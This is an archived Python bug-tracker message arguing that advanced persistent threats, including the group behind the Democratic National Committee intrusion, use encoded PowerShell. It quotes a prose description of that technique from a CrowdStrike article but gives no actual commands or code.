This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author Alexander Riccio
Recipients Alexander Riccio, brett.cannon, paul.moore, steve.dower, theller, tim.golden, zach.ware
Date 2016-07-02.13:59:57
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1467467997.95.0.703208782698.issue26137@psf.upfronthosting.co.za>
In-reply-to
Content 
It's not just Stuxnet, as at least one other Advanced Persistent Threat uses that tactic. An APT (likely Russian intelligence) recently used encoded PowerShell to break into the Democratic National Committe: https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

From that article:

> This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory.

(As a fun coincidence, they also used py2exe to distribute other modules, which is kinda like a separate interpreter using safe_exec)
History
Date User Action Args
2016-07-02 13:59:58Alexander Ricciosetrecipients: + Alexander Riccio, brett.cannon, theller, paul.moore, tim.golden, zach.ware, steve.dower
2016-07-02 13:59:57Alexander Ricciosetmessageid: <1467467997.95.0.703208782698.issue26137@psf.upfronthosting.co.za>
2016-07-02 13:59:57Alexander Ricciolinkissue26137 messages
2016-07-02 13:59:57Alexander Ricciocreate